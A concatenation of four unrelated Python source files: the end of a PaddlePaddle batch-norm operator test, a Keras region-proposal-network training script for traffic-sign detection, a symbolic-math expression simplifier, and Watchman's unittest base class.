return grad_x, grad_scale, grad_offset
def create_or_get_tensor(scope, var_name, var, place):
tensor = scope.var(var_name).get_tensor()
if var is not None:
assert isinstance(var, np.ndarray)
tensor.set_lod([[]])
tensor.set_dims(var.shape)
tensor.set(var, place)
return tensor
def set_output_grad(scope, outputs, place, feed_dict=None):
def __set_tensor__(name, data=None):
out_tensor = scope.find_var(name).get_tensor()
grad_tensor = scope.var(grad_var_name(name)).get_tensor()
out_dtype = out_tensor.dtype()
if data is None:
if out_dtype == core.DataType.FP64:
data = np.ones(out_tensor.shape(), dtype=np.float64)
elif out_dtype == core.DataType.FP32:
data = np.ones(out_tensor.shape(), dtype=np.float32)
else:
raise ValueError("Not supported data type " + str(out_dtype))
grad_tensor.set(data, place)
for output in outputs:
data = None
if output in feed_dict:
data = feed_dict[output]
__set_tensor__(output, data)
class TestBatchNormOp(OpTest):
def __assert_close(self, tensor, np_array, msg, atol=1e-4):
self.assertTrue(np.allclose(np.array(tensor), np_array, atol=atol), msg)
def test_python(self):
data_format = "NHWC"
epsilon = 0.00001
momentum = 0.9
# N, H, W, C: 2, 3, 4, 2
n, h, w, c = 2, 3, 4, 2
x_shape = [n, h, w, c]
scale_shape = [c]
x_val = np.random.random_sample(x_shape).astype(np.float32)
scale_val = np.random.random_sample(scale_shape).astype(np.float32)
bias_val = np.random.random_sample(scale_shape).astype(np.float32)
mean = np.zeros(scale_shape).astype(np.float32)
variance = np.ones(scale_shape).astype(np.float32)
# run forward
y_out, saved_mean, var_ref = _reference_training(
x_val, scale_val, bias_val, epsilon, "NHWC")
#
mean_out = saved_mean * (1. - momentum) + momentum * mean
variance_out = var_ref * (1. - momentum) + momentum * variance
saved_variance = 1. / np.sqrt(var_ref + epsilon)
# running N, C, H, W case
# should produce the same results
x_shape2 = [n, c, h, w]
x_val2 = np.transpose(x_val, (0, 3, 1, 2))
y_out2, saved_mean2, var_ref2 = _reference_training(
x_val2, scale_val, bias_val, epsilon, "NCHW")
self.__assert_close(saved_mean, saved_mean2, "batch mean")
self.__assert_close(var_ref, var_ref2, "batch variance")
# transfer (N, C, H, W) back to (N, H, W, C)
y_out2_trans = np.transpose(y_out2, (0, 2, 3, 1))
self.__assert_close(y_out, y_out2_trans, "batch variance")
print 'python: NHWC, NCHW, forward checking passed'
# test backward now
# NHWC
self.y_grad = np.random.random_sample(x_shape).astype(np.float32)
y_grad = self.y_grad
# y_grad = np.ones(x_shape).astype(np.float32)
x_grad_ref, scale_grad_ref, bias_grad_ref = _reference_grad(
x_val, y_grad, scale_val, saved_mean, var_ref, epsilon, "NHWC")
# NCHW
y_grad2 = np.transpose(y_grad, (0, 3, 1, 2))
# y_grad2 = np.ones(x_shape2).astype(np.float32)
x_grad_ref2, scale_grad_ref2, bias_grad_ref2 = _reference_grad(
x_val2, y_grad2, scale_val, saved_mean2, var_ref2, epsilon, "NCHW")
self.__assert_close(scale_grad_ref, scale_grad_ref2, "scale gradient")
self.__assert_close(bias_grad_ref, bias_grad_ref2, "bias gradient")
x_grad_transpose = np.transpose(x_grad_ref2, (0, 2, 3, 1))
self.__assert_close(x_grad_ref, x_grad_transpose, "x gradient")
print 'python: NHWC, NCHW, backward checking passed'
def test_forward_backward(self):
def test_with_place(place, tensor_format):
# attr
epsilon = 0.00001
momentum = 0.9
# N, H, W, C: 12, 3, 4, 2
n, h, w, c = 2, 3, 4, 2
if data_format == "NHWC":
x_shape = [n, h, w, c]
elif data_format == "NCHW":
x_shape = [n, c, h, w]
else:
raise ValueError("Unknown data type.")
scale_shape = [c]
x_val = np.random.random_sample(x_shape).astype(np.float32)
scale_val = np.random.random_sample(scale_shape).astype(np.float32)
bias_val = np.random.random_sample(scale_shape).astype(np.float32)
mean = np.zeros(scale_shape).astype(np.float32)
variance = np.ones(scale_shape).astype(np.float32)
# run forward
y_out, saved_mean, var_ref = _reference_training(
x_val, scale_val, bias_val, epsilon, data_format)
# update moving mean and variance
mean_out = saved_mean * (1. - momentum) + momentum * mean
variance_out = var_ref * (1. - momentum) + momentum * variance
saved_variance = 1. / np.sqrt(var_ref + epsilon)
# for gradient test
# y_grad = np.ones(x_shape).astype(np.float32)
y_grad = np.zeros(x_shape).astype(np.float32)
y_grad[0, 0, 0, 0] = 1.
# y_grad = np.random.random_sample(x_shape).astype(np.float32)
x_grad_ref, scale_grad_ref, bias_grad_ref = _reference_grad(
x_val, y_grad, scale_val, saved_mean, var_ref, epsilon,
data_format)
scope = core.Scope()
# create input
x_tensor = create_or_get_tensor(scope, "x_val", x_val, place)
scale_tensor = create_or_get_tensor(scope, "scale_val", scale_val,
place)
bias_tensor = create_or_get_tensor(scope, "bias_val", bias_val,
place)
mean_tensor = create_or_get_tensor(scope, "mean", mean, place)
variance_tensor = create_or_get_tensor(scope, "variance", variance,
place)
# create output
y_tensor = create_or_get_tensor(scope, "y_out", None, place)
saved_mean_tensor = create_or_get_tensor(scope, "saved_mean", None,
place)
saved_variance_tensor = create_or_get_tensor(
scope, "saved_variance", None, place)
mean_out_tensor = mean_tensor
variance_out_tensor = variance_tensor
batch_norm_op = Operator(
"batch_norm",
# inputs
X="x_val",
Scale="scale_val",
Bias="bias_val",
Mean="mean",
Variance="variance",
# outputs
Y="y_out",
MeanOut="mean",
VarianceOut="variance",
SavedMean="saved_mean",
SavedVariance="saved_variance",
# attrs
is_test=False,
tensor_format=tensor_format,
momentum=momentum,
epsilon=epsilon)
ctx = core.DeviceContext.create(place)
batch_norm_op.run(scope, ctx)
# check forward result
self.__assert_close(y_tensor, y_out, "y_out")
self.__assert_close(saved_mean_tensor, saved_mean, "saved_mean")
self.__assert_close(saved_variance_tensor, saved_variance,
"saved_variance")
self.__assert_close(mean_out_tensor, mean_out, "mean_out")
if isinstance(place, core.GPUPlace):
atol = 5e-2
else:
atol = 1e-4
self.__assert_close(variance_out_tensor, variance_out,
"variance_out", atol)
print "op test forward passed: ", str(place), tensor_format
# run backward
batch_norm_op_grad = get_backward_op(scope, batch_norm_op, set())
set_output_grad(
scope,
["y_out", "mean", "variance", "saved_mean", "saved_variance"],
place,
feed_dict={"y_out": y_grad})
batch_norm_op_grad.run(scope, ctx)
x_grad_tensor = create_or_get_tensor(scope,
grad_var_name("x_val"), None,
place)
scale_grad_tensor = create_or_get_tensor(scope,
grad_var_name("scale_val"),
None, place)
bias_grad_tensor = create_or_get_tensor(scope,
grad_var_name("bias_val"),
None, place)
# check gradient output
self.__assert_close(x_grad_tensor, x_grad_ref, "x_grad")
self.__assert_close(scale_grad_tensor, scale_grad_ref, "scale_grad")
self.__assert_close(bias_grad_tensor, bias_grad_ref, "bias_grad")
print "op test backward passed: ", str(place), tensor_format
places = [core.CPUPlace()]
if core.is_compile_gpu() and core.op_support_gpu("batch_norm"):
places.append(core.GPUPlace(0))
for place in places:
for data_format in ["NCHW", "NHWC"]:
test_with_place(place, data_format)
if __name__ == '__main__':
unittest.main()
|
|
import keras
from keras.models import Model, Sequential
from keras.layers import Activation, Dropout, Flatten, Dense, Input
from keras.layers.convolutional import Conv2D
from keras.layers.pooling import MaxPooling2D
from keras.layers.merge import Concatenate
from keras.callbacks import ProgbarLogger, ModelCheckpoint, TensorBoard, EarlyStopping
from keras.preprocessing.image import ImageDataGenerator
import keras.backend as K
import numpy as np
from skimage.io import imread
################################# BASE LAYERS #################################
def vgg(input_layer, trainable=False):
vgg19 = keras.applications.vgg19.VGG19(include_top=False)
vgg19.trainable = trainable
return vgg19(input_layer)
def base(input_layer):
return Sequential([
Conv2D(filters=32, kernel_size=(3,3), padding="same", activation='relu', input_shape=(800,1360,3)),
MaxPooling2D(pool_size=(2, 2)),
Conv2D(filters=64, kernel_size=(5,5), padding="same", activation='relu'),
MaxPooling2D(pool_size=(2, 2)),
])(input_layer)
################################# RPN LAYERS #################################
def rpn(base, k):
x = Conv2D(256, (3, 3), padding='same', activation='relu',
kernel_initializer=keras.initializers.RandomNormal(0.0, 0.01), name='rpn_conv_1')(base)
return(
Conv2D(k, (1, 1), activation='sigmoid',
kernel_initializer=keras.initializers.RandomNormal(0.0, 0.01), name='rpn_cls')(x),
Conv2D(k*4, (1, 1), activation='linear',
kernel_initializer=keras.initializers.RandomNormal(0.0, 0.01), name='rpn_regr')(x))
################################# BOXES #################################
def get_anchors(rows, cols, sizes, stride):
# Generate 1:1 anchor boxes
# anc_num = len(sizes) [= k in the frcnn paper]
# shape = (rows, cols, anc_num, 4)
return np.expand_dims(np.tile(np.indices((rows,cols)).transpose((1,2,0)) * stride + .5, 2), axis=2).repeat(len(sizes), axis=2) \
+ np.repeat(np.expand_dims(np.array(sizes), axis=1), 4, axis=1) * [-.5, -.5, .5, .5]
def intersect(b1, b2):
# b1.shape = (rows, cols, anc_num, 4)
# b2.shape = (4,)
m = np.minimum(b1,b2)
M = np.maximum(b1,b2)
h = np.maximum(m[...,2] - M[...,0], 0)
w = np.maximum(m[...,3] - M[...,1], 0)
return w*h
def union(b1, b2, iarea):
# b1.shape = (rows, cols, anc_num, 4)
# b2.shape = (4,)
a1 = (b1[...,2]-b1[...,0]) * (b1[...,3]-b1[...,1])
a2 = (b2[...,2]-b2[...,0]) * (b2[...,3]-b2[...,1])
return a1 + a2 - iarea
def iou(b1, b2):
# b1.shape = (rows, cols, anc_num, 4)
# b2.shape = (4,)
iarea = intersect(b1, b2)
uarea = union(b1, b2, iarea)
return iarea/uarea
def coords2param(ancs, gtbs):
# Convert absolute coords to parametrized params (see frcnn paper)
# ancs.shape = gtbs.shape = (rows, cols, anc_num, 4)
# box = [y1,x1,y2,x2]
wa = ancs[...,3] - ancs[...,1]
ha = ancs[...,2] - ancs[...,0]
tx = (gtbs[...,1] - ancs[...,1]) / wa
ty = (gtbs[...,1] - ancs[...,1]) / ha
tw = np.log((gtbs[...,3] - gtbs[...,1]) / wa)
th = np.log((gtbs[...,2] - gtbs[...,0]) / ha)
# shape = (row, cols, anc_num, 4)
return np.stack([tx,ty,tw,th], axis=-1)
def anchors_vs_gt(ancs, gtbs, lo, hi):
# ancs.shape = (rows, cols, anc_num, 4)
# gtbs.shape = (gtb_num, 4)
# ious.shape = (rows, cols, anc_num, gtb_num)
ious = np.stack([iou(ancs, gtb) for gtb in gtbs], axis=-1)
# best.shape = (gtb_num,)
best = ious.reshape((-1, gtbs.shape[0])).max(axis=0)
# box_pos.shape = box_neg.shape = (rows, cols, anc_num)
box_pos = np.logical_or(ious.max(axis=-1) >= hi, np.logical_and(ious == best, best > 0).any(axis=-1))
box_neg = ious.max(axis=-1) <= lo
# hard_pos = anchor boxes with iou >= 0.7 with any gt box
# soft_pos = anchor boxes with highest iou with a gt box
# hard_neg = anchor boxes with iou <= 0.3 with all gt boxes
## print("\thard_pos = {:d}".format(np.sum(ious.max(axis=-1) >= hi)))
## print("\tsoft_pos = {:d}".format(np.sum(np.logical_and(ious == best, best > 0).any(axis=-1))))
## print("\thard_neg = {:d}".format(np.sum(ious.max(axis=-1) <= lo)))
# best_gt.shape = (rows, cols, anc_num, 4)
best_gt = np.take(gtbs, ious.argmax(axis=-1), axis=0)
return box_pos, box_neg, coords2param(ancs, best_gt)
def filter_boxes(pos, neg, num):
# Only use num boxes, with pos:neg at most 1:1 unless pos < num/2
p_num = pos[pos].shape[0]
n_num = neg[neg].shape[0]
if p_num > num/2:
pos[np.vsplit(np.vstack(np.where(pos))[:,np.random.choice(p_num, p_num-num//2, replace=False)], pos.ndim)] = False
p_num = num//2
if n_num + p_num > num:
neg[np.vsplit(np.vstack(np.where(neg))[:,np.random.choice(n_num, n_num-num+p_num, replace=False)], neg.ndim)] = False
return pos, neg
################################# LOSSES #################################
def rpn_regr_loss(num_ancs):
def loss(ytrue, ypred, ptrue):
# ytrue.shape = (rows, cols, num_ancs * 4)
# ypred.shape = (rows, cols, num_ancs * 4)
# ptrue.shape = (rows, cols, num_ancs * 4)
# ancs.shape = (rows, cols, num_ancs * 4)
dy = ytrue - ypred
sw = K.cast(K.less(K.abs(dy), 1), dtype=K.floatx())
r1 = sw*dy*dy*.5
r2 = (1-sw)*(K.abs(dy)-.5)
return K.sum((r1+r2) * ptrue)
return lambda ytrue, ypred: \
loss(ytrue[...,4*num_ancs:],
ypred,
ytrue[...,:4*num_ancs])
def rpn_cls_loss(num_ancs):
def loss(postrue, negtrue, ppred):
# Add epsilon = 1e-4 to prevent log(0)
return K.sum(- postrue * K.log(1e-4 + ppred)
- negtrue * K.log(1e-4 + 1-ppred))
return lambda ptrue, ppred: loss(ptrue[...,:num_ancs], ptrue[...,num_ancs:], ppred)
################################# DATA #################################
def datagen(start, stop, ancs=None, shuffle=True):
"""Generator for GTSDB dataset
Args:
start, stop = range of images to use
ancs = anchor boxes to use. Use get_anchors() to generate these.
Dimensions should be (imageheight/basenet_stride, imagewidht/basenet_stride, k, basenet_stride)
Defaults to be get_anchors(200, 340, [16,24,32], 4)
shuffle = whether to shuffle the data
"""
if ancs is None:
ancs = get_anchors(200, 340, [16,24,32], 4)
csv = np.loadtxt('../dataset/PNG_train/gt.txt', delimiter=',', converters = {0: lambda x:x[:-4]}, dtype=np.int32)
idx = np.arange(start, stop)
for i in idx:
temp = csv[csv[:,0] == i]
temp = temp[:,[2,1,4,3]]
# temp.shape = (gtb_num, 4)
## print("fname = ../dataset/PNG_train/{:05d}.png".format(i))
pos, neg, gtbs = anchors_vs_gt(ancs, temp, .3, .7)
gtbs = gtbs.reshape((gtbs.shape[0], gtbs.shape[1], -1))
# pos.shape = neg.shape = (rows, cols, anc_num)
# gtbs.shape = (row, cols, anc_num * 4)
pos, neg = filter_boxes(pos, neg, 256)
# x_img.shape = (1, imgh, imgw, imgchannels)
# y_cls.shape = (row, cols, anc_num * 2)
# y_regr.shape = (row, cols, anc_num * 8)
x_img = np.expand_dims(imread('../dataset/PNG_train/{:05d}.png'.format(i)), 0)
y_cls = np.expand_dims(np.concatenate((pos, neg), axis=-1).astype(np.int32), 0)
y_regr = np.expand_dims(np.concatenate((pos.repeat(4, axis=-1), gtbs), axis=-1), 0)
yield (x_img, [y_cls, y_regr])
################################# MODEL #################################
# Find existing model
import os, re
temp = [re.compile('gtsdb_rpn-(\d+)\.hdf5').match(fn) for fn in os.listdir('models/gtsdb_rpn/')]
temp = [int(m.group(1)) for m in temp if m is not None]
# Load model if it exsits. Else build new model
if len(temp) == 0:
inp = Input(shape=(800,1360,3))
model = Model(inputs=inp, outputs=rpn(base(inp), 3))
model.compile(optimizer='sgd', loss={'rpn_cls': rpn_cls_loss(3), 'rpn_regr': rpn_regr_loss(3)})
else:
model = keras.models.load_model('models/gtsdb_rpn/gtsdb_rpn-{:d}.hdf5'.format(max(temp)))
################################# TRAIN #################################
model.fit_generator(
datagen(0, 600, shuffle=True),
steps_per_epoch = 600,
epochs = 100,
validation_data = datagen(600, 900),
validation_steps = 300,
verbose = 1,
callbacks = [
ProgbarLogger(count_mode='steps'),
ModelCheckpoint('models/gtsdb_rpn/gtsdb_rpn-{epoch}.hdf5', verbose=1, save_best_only = True),
TensorBoard(log_dir='tblogs/gtsdb_rpn/', write_graph=True, write_grads=True, write_images=True),
EarlyStopping(patience=5, verbose=1),
],)
|
|
from . import stdops as stdops
from . import core
from . import copy
from . import operator
from . import factor
from .core import wild
def reduce(func, iterable, initial=None, reverse=False):
x=initial
if reverse:
iterable=reversed(iterable)
for e in iterable:
x=func(x,e) if x is not None else e
return x
#TODO: Change cmp into key friendly order
def cmp_to_key(mycmp):
'Convert a cmp= function into a key= function'
class K(object):
def __init__(self, obj, *args):
self.obj = obj
def __lt__(self, other):
return mycmp(self.obj, other.obj) < 0
def __gt__(self, other):
return mycmp(self.obj, other.obj) > 0
def __eq__(self, other):
return mycmp(self.obj, other.obj) == 0
def __le__(self, other):
return mycmp(self.obj, other.obj) <= 0
def __ge__(self, other):
return mycmp(self.obj, other.obj) >= 0
def __ne__(self, other):
return mycmp(self.obj, other.obj) != 0
return K
def _order(a,b):
'''
used internally to put stuff in canonical order
'''
if isinstance(a, core.Number):
if(isinstance(b, core.Number)):
return -1 if a.n < b.n else (0 if a.n == b.n else 1)
return -1
elif isinstance(b, core.Number):
return 1
elif isinstance(a, core.Symbol):
if(isinstance(b, core.Symbol)):
return -1 if a.name < b.name else (0 if a.name == b.name else 1)
return -1
elif isinstance(b, core.Symbol):
return 1
else:
return -1 if str(a) < str(b) else (0 if str(a) == str(b) else 1)
def _assoc_reorder(exp):
if len(exp) == 1:
return exp
# canonicalize the arguments first
args = list([_assoc_reorder(x) for x in exp.args])
if tuple(args) != tuple(exp.args):
exp = core.Fn(exp.fn, *args)
# if it's associative and one of the arguments is another instance of the
# same function, canonicalize the order
if len(exp.args) == 2 and 'associative' in exp.kargs and exp.kargs['associative']:
args = exp._get_assoc_arguments()
oldargs = tuple(args)
args.sort(key=cmp_to_key(_order))
if tuple(args) != oldargs:
kargs = copy.copy(exp.kargs)
exp = reduce(lambda a, b: exp.fn(a,b), args)
return exp
def _remove_subtractions(exp):
a,b = core.wilds('a b')
vals = {}
if exp.match(stdops.Sub(a,b), vals):
return vals['a'] + (-vals['b'])
else:
return exp
def _strip_identities_pass(exp):
a,b,c = core.wilds('a b c')
vals = {}
if exp.match(a(b, c)):
kargs = exp[0].kargs
lidentity = kargs['lidentity'] if 'lidentity' in kargs else kargs['identity'] if 'identity' in kargs else None
ridentity = kargs['ridentity'] if 'ridentity' in kargs else kargs['identity'] if 'identity' in kargs else None
if lidentity != None and exp.match(a(lidentity, b), vals):
return vals['b'].walk(_strip_identities)
elif ridentity != None and exp.match(a(b, ridentity), vals):
return vals['b'].walk(_strip_identities)
return exp
def _strip_identities(exp):
rv = exp.walk(_strip_identities_pass)
while rv != exp:
exp = rv
rv = exp.walk(_strip_identities_pass)
return rv
def _zero_terms(exp):
if hasattr(exp[0],'kargs') and 'zero' in exp[0].kargs:
for i in range(1, len(exp)):
if exp[1] == exp[0].kargs['zero'] or exp[2] == exp[0].kargs['zero']:
return exp[0].kargs['zero']
return exp
def _distribute(op1, op2):
def _(exp):
a,b,c = core.wilds('a b c')
vals = {}
if exp.match(op1(op2(a, b), c), vals):
return op2(op1(vals['c'], vals['a']), op1(vals['c'], vals['b']))
elif exp.match(op1(a, op2(b, c)), vals):
return op2(op1(vals['a'], vals['b']), op1(vals['a'], vals['c']))
else:
return exp
return _
def _simplify_mul_div(exp):
a,b,c = core.wilds('a b c')
vals = core.WildResults()
if exp.match(b + (a * b), vals) or exp.match(b + (b * a), vals):
if isinstance(vals.a, core.Number):
return (vals['a'] + 1) * vals['b']
if exp.match(c * (b / c), vals) or exp.match((b / c) * c, vals):
return vals.b
if exp.match(a * (b / c), vals) or exp.match((b / c) * a, vals):
return (vals.a * vals.b) / vals.c
elif exp.match(a / b, vals) and isinstance(vals.b, core.Number):
return vals.a * (1.0 / vals.b.value())
elif exp.match(a / b, vals) and factor.is_factor(vals.b, vals.a):
return factor.get_coefficient(vals.a, vals.b)
if exp.match(((a) / (a ** b)), vals):
if isinstance(vals.b, core.Number):
return (core.symbolic(1) / vals.a ** (vals.b.value()-1))
if exp.match(((a ** b) / (a)), vals):
if isinstance(vals.b, core.Number):
return (vals.a ** (vals.b.value()-1))
if exp.match(((a ** c) / (a ** b)), vals):
if isinstance(vals.b, core.Number) and isinstance(vals.c, core.Number):
if c > b:
return ((vals.a ** (vals.c.value()-vals.b.value())) / 1)
elif c == b:
return core.symbolic(1)
else:
print("test")
return (core.symbolic(1) / (vals.a ** (vals.b.value()-vals.c.value())))
if exp.match(a * (b / c), vals) or exp.match((b / c) * a, vals):
return (vals.a * vals.b) / vals.c
return exp
def _simplify_known_values(exp):
a,b,c = core.wilds('a b c')
vals = {}
if exp.match(a(b,c), vals) \
and 'numeric' in vals['a'].kargs \
and isinstance(vals['b'], core._KnownValue) \
and isinstance(vals['c'], core._KnownValue):
cast = vals['a'].kargs['cast'] if 'cast' in vals['a'].kargs else (lambda x: x)
nfn = getattr(operator, vals['a'].kargs['numeric'])
return core.symbolic(nfn(cast(vals['b'].value()), cast(vals['c'].value())))
else:
return exp
def _get_factors(exp):
rv = {}
a,b = core.wilds('a b')
vals = {}
if exp.match(a * b, vals):
tmp = _get_factors(vals['a'])
for i in tmp:
if i in rv:
rv[i] = tmp[i] + rv[i]
else:
rv[i] = tmp[i]
tmp = _get_factors(vals['b'])
for i in tmp:
if i in rv:
rv[i] = tmp[i] + rv[i]
else:
rv[i] = tmp[i]
elif exp.match(a ** b, vals):
rv = _get_factors(vals['a'])
for k in rv:
rv[k] = vals['b'] * rv[k]
else:
rv[exp] = 1
return rv
def _fold_additions(exp):
a,b,c = core.wilds('a b c')
vals = {}
if exp.match(a + a, vals):
return vals['a'] * 2
elif exp.match(a + (a * b), vals) or exp.match(a + (b * a), vals):
return (vals['b'] + 1) * vals['a']
elif exp.match(b + (a * b), vals) or exp.match(b + (b * a), vals):
return (vals['a'] + 1) * vals['b']
else:
return exp
def _convert_to_pow(exp):
a,b,c = core.wilds('a b c')
if not exp.match(a(b,c)):
return exp
fs = _get_factors(exp)
rv = 1
for k in fs:
if fs[k] == 1:
rv = k * rv
else:
rv = (k ** fs[k]) * rv
return rv
def _args(exp):
return list([exp[x] for x in range(1, len(exp))])
def _simplify_bitops(exp):
a,b = core.wilds('a b')
vals = core.WildResults()
if exp.match(a ^ a):
return core.symbolic(0)
elif exp.match(a | a, vals):
return vals.a
elif exp.match(a & a, vals):
return vals.a
elif exp.match((a << b) >> b, vals) or exp.match((a >> b) << b, vals):
return vals.a
else:
return exp
def _simplify_bitops(exp):
a,b = core.wilds('a b')
vals = core.WildResults()
if exp.match(a ^ a):
return core.symbolic(0)
elif exp.match(a | a, vals):
return vals.a
elif exp.match(a & a, vals):
return vals.a
elif exp.match((a << b) >> b, vals) or exp.match((a >> b) << b, vals):
return vals.a
else:
return exp
def _commutative_reorder(exp):
oexp = exp
if len(exp) > 1 and 'commutative' in exp[0].kargs:
args = list([x.walk(_commutative_reorder) for x in _args(exp)])
args.sort(key=cmp_to_key(_order))
exp = exp[0](*args)
return exp
#TODO: Simplify Trig Identities
def _simplify_pass(exp):
exp = exp.walk(\
_commutative_reorder, \
_strip_identities, \
_simplify_mul_div, \
_strip_identities, \
_simplify_known_values, \
_strip_identities, \
_convert_to_pow, \
_strip_identities, \
_remove_subtractions, \
_strip_identities, \
_distribute(stdops.BitAnd, stdops.BitOr), \
_strip_identities, \
_distribute(stdops.Mul, stdops.Add), \
_strip_identities, \
_fold_additions, \
_strip_identities, \
_zero_terms, \
_strip_identities, \
_commutative_reorder, \
_strip_identities, \
_distribute(stdops.BitAnd, stdops.BitOr), \
_strip_identities, \
_distribute(stdops.Mul, stdops.Add), \
_strip_identities, \
_assoc_reorder, \
_strip_identities, \
_simplify_bitops, \
_strip_identities, \
_simplify_mul_div, \
_strip_identities \
)
return exp.walk(_strip_identities)
def simplify(exp):
'''
attempts to simplify an expression
is knowledgeable of the operations defined in symath.stdops
'''
sexp = _simplify_pass(exp)
while sexp != exp:
#print '%s => %s' % (exp, sexp)
exp = sexp
sexp = _simplify_pass(exp)
return exp
|
|
# vim:ts=4:sw=4:et:
# Copyright 2012-present Facebook, Inc.
# Licensed under the Apache License, Version 2.0
# no unicode literals
from __future__ import absolute_import, division, print_function
import errno
import functools
import inspect
import os
import os.path
import tempfile
import time
import Interrupt
import pywatchman
import TempDir
import WatchmanInstance
from path_utils import norm_absolute_path, norm_relative_path
try:
import unittest2 as unittest
except ImportError:
import unittest
if pywatchman.compat.PYTHON3:
STRING_TYPES = (str, bytes)
else:
STRING_TYPES = (str, unicode) # noqa: F821
if os.name == "nt":
# monkey patch to hopefully minimize test flakiness
def wrap_with_backoff(fn):
def wrapper(*args, **kwargs):
delay = 0.01
attempts = 10
while True:
try:
return fn(*args, **kwargs)
except WindowsError as e:
if attempts == 0:
raise
# WindowsError: [Error 32] The process cannot access the
# file because it is being used by another process.
# Error 5: Access is denied.
if e.winerror not in (5, 32):
raise
attempts = attempts - 1
time.sleep(delay)
delay = delay * 2
return wrapper
for name in ["rename", "unlink", "remove", "rmdir", "makedirs"]:
setattr(os, name, wrap_with_backoff(getattr(os, name)))
if not pywatchman.compat.PYTHON3:
unittest.TestCase.assertCountEqual = unittest.TestCase.assertItemsEqual
unittest.TestCase.assertRegex = unittest.TestCase.assertRegexpMatches
unittest.TestCase.assertRaisesRegex = unittest.TestCase.assertRaisesRegexp
class TempDirPerTestMixin(unittest.TestCase):
def __init__(self, *args, **kwargs):
super(TempDirPerTestMixin, self).__init__(*args, **kwargs)
self.tempdir = None
def setUp(self):
super(TempDirPerTestMixin, self).setUp()
id = self._getTempDirName()
# Arrange for any temporary stuff we create to go under
# our global tempdir and put it in a dir named for the test
self.tempdir = os.path.join(TempDir.get_temp_dir().get_dir(), id)
os.mkdir(self.tempdir)
def _getTempDirName(self):
return self.id()
def mkdtemp(self, **kwargs):
return norm_absolute_path(tempfile.mkdtemp(dir=self.tempdir, **kwargs))
def mktemp(self, prefix=""):
f, name = tempfile.mkstemp(prefix=prefix, dir=self.tempdir)
os.close(f)
return name
class WatchmanTestCase(TempDirPerTestMixin, unittest.TestCase):
def __init__(self, methodName="run"):
super(WatchmanTestCase, self).__init__(methodName)
self.setDefaultConfiguration()
self.maxDiff = None
self.attempt = 0
# ASAN-enabled builds can be slower enough that we hit timeouts
# with the default of 1 second
self.socketTimeout = 10.0
def requiresPersistentSession(self):
return False
def checkPersistentSession(self):
if self.requiresPersistentSession() and self.transport == "cli":
self.skipTest("need persistent session")
def checkOSApplicability(self):
# override this to call self.skipTest if this test class should skip
# on the current OS
pass
def skipIfCapabilityMissing(self, cap, reason):
res = self.getClient().capabilityCheck([cap])
if not res["capabilities"][cap]:
self.skipTest(reason)
def setUp(self):
super(WatchmanTestCase, self).setUp()
self.checkPersistentSession()
self.checkOSApplicability()
def getClient(self, inst=None, replace_cached=False, no_cache=False):
if inst or not hasattr(self, "client") or no_cache:
client = pywatchman.client(
timeout=self.socketTimeout,
transport=self.transport,
sendEncoding=self.encoding,
recvEncoding=self.encoding,
sockpath=(inst or WatchmanInstance.getSharedInstance()).getSockPath(),
)
if (not inst or replace_cached) and not no_cache:
# only cache the client if it points to the shared instance
self.client = client
self.addCleanup(lambda: self.__clearClient())
return client
return self.client
def __logTestInfo(self, test, msg):
if hasattr(self, "client"):
try:
self.getClient().query("log", "debug", "TEST: %s %s\n\n" % (test, msg))
except Exception:
pass
def setAttemptNumber(self, attempt):
self.attempt = attempt
def __clearClient(self):
if hasattr(self, "client"):
self.client.close()
delattr(self, "client")
def _getTempDirName(self):
name = self._getLongTestID()
if self.attempt > 0:
name += "-%d" % self.attempt
return name
def _getLongTestID(self):
return "%s.%s.%s" % (self.id(), self.transport, self.encoding)
def run(self, result):
if result is None:
raise Exception("MUST be a runtests.py:Result instance")
id = self._getLongTestID()
try:
self.__logTestInfo(id, "BEGIN")
super(WatchmanTestCase, self).run(result)
finally:
try:
self.watchmanCommand("log-level", "off")
self.getClient().getLog(remove=True)
except Exception:
pass
self.__logTestInfo(id, "END")
self.__clearWatches()
self.__clearClient()
return result
def dumpLogs(self):
""" used in travis CI to show the hopefully relevant log snippets """
print(self.getLogSample())
def getLogSample(self):
""" used in CI to show the hopefully relevant log snippets """
inst = WatchmanInstance.getSharedInstance()
def tail(logstr, n):
lines = logstr.split("\n")[-n:]
return "\n".join(lines)
return "\n".join(
[
"CLI logs",
tail(inst.getCLILogContents(), 500),
"Server logs",
tail(inst.getServerLogContents(), 500),
]
)
def getServerLogContents(self):
"""
Returns the contents of the server log file as an array
that has already been split by line.
"""
return WatchmanInstance.getSharedInstance().getServerLogContents().split("\n")
def setConfiguration(self, transport, encoding):
self.transport = transport
self.encoding = encoding
def removeRelative(self, base, *fname):
fname = os.path.join(base, *fname)
os.remove(fname)
def touch(self, fname, times=None):
try:
os.utime(fname, times)
except OSError as e:
if e.errno == errno.ENOENT:
with open(fname, "a"):
os.utime(fname, times)
else:
raise
def touchRelative(self, base, *fname):
fname = os.path.join(base, *fname)
self.touch(fname, None)
def __clearWatches(self):
if hasattr(self, "client"):
try:
self.client.subs = {}
self.client.sub_by_root = {}
self.watchmanCommand("watch-del-all")
except Exception:
pass
def __del__(self):
self.__clearWatches()
def watchmanCommand(self, *args):
return self.getClient().query(*args)
def _waitForCheck(self, cond, res_check, timeout):
deadline = time.time() + timeout
res = None
while time.time() < deadline:
Interrupt.checkInterrupt()
res = cond()
if res_check(res):
return [True, res]
time.sleep(0.03)
return [False, res]
# Continually invoke `cond` until it returns true or timeout
# is reached. Returns a tuple of [bool, result] where the
# first element of the tuple indicates success/failure and
# the second element is the return value from the condition
def waitFor(self, cond, timeout=10):
return self._waitForCheck(cond, lambda res: res, timeout)
def waitForEqual(self, expected, actual_cond, timeout=10):
return self._waitForCheck(actual_cond, lambda res: res == expected, timeout)
def assertWaitFor(self, cond, timeout=10, message=None):
status, res = self.waitFor(cond, timeout)
if status:
return res
if message is None:
message = "%s was not met in %s seconds: %s" % (cond, timeout, res)
self.fail(message)
def assertWaitForEqual(self, expected, actual_cond, timeout=10, message=None):
status, res = self.waitForEqual(expected, actual_cond, timeout)
if status:
return res
if message is None:
message = "%s was not equal to %s in %s seconds: %s" % (
actual_cond,
expected,
timeout,
res,
)
self.fail(message)
def getFileList(self, root, cursor=None, relativeRoot=None):
expr = {"expression": ["exists"], "fields": ["name"]}
if cursor:
expr["since"] = cursor
if relativeRoot:
expr["relative_root"] = relativeRoot
res = self.watchmanCommand("query", root, expr)
files = res["files"]
self.last_file_list = files
return files
def waitForSync(self, root):
""" ensure that watchman has observed any pending file changes
This is most useful after mutating the filesystem and before
attempting to perform a since query
"""
self.watchmanCommand(
"query", root, {"expression": ["name", "_bogus_"], "fields": ["name"]}
)
